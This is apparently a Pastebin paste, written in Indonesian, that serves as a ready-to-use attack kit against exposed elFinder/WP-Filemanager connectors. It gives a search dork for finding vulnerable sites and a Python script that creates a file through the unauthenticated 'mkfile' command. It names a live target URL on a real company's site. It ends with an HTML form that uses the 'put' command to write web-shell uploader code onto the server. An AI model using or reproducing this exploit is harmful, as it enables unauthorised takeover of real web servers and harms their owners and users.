Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =[ Dork ]=
- dork : "Index Of /" + "Wp-Filemanager"
- *Kalian Bisa kembangkan Lagi.
- =[ Code Hash Key ]=
- import json
- import requests as req
- phash = "l1_Lw"
- r=req.Session()
- user_agent={
- "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
- }
- r.headers.update(user_agent)
- def is_json(myjson):
- try:
- json_object = json.loads(myjson)
- except ValueError as e:
- return False
- return True
- def mkfile(target):
- data={"cmd" : "mkfile", "target":phash, "name":input("nama_shell : ")}
- resp=r.post(target, data=data)
- respon = resp.text
- if resp.status_code == 200 and is_json(respon):
- resp_json=respon.replace(r"\/", "").replace("\\", "")
- resp_json=json.loads(resp_json)
- return resp_json["added"][0]["hash"]
- else:
- return False
- hash=mkfile(input("Target antum : "))
- if hash :
- print("ini hashnya => "+hash)
- else:
- print("ga bisa")
- ====================================================
- =[ Live Target Beserta Path Nya]=
- http://www.smecargo.in/erp/admin/js/plugins/elfinder/php/connector.minimal.php
- =====================================================
- =[ KODE CSRF ]=
- <form method="post" action="isi disini url targetnya" enctype="multipart/form-data">
- <input type="text" name="cmd" value="put">
- <input type="text" name="target" value="isi disini hasil hashnya">
- <textarea name="content">isi code shell uploadernya</textarea>
- <input type="submit">
- </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
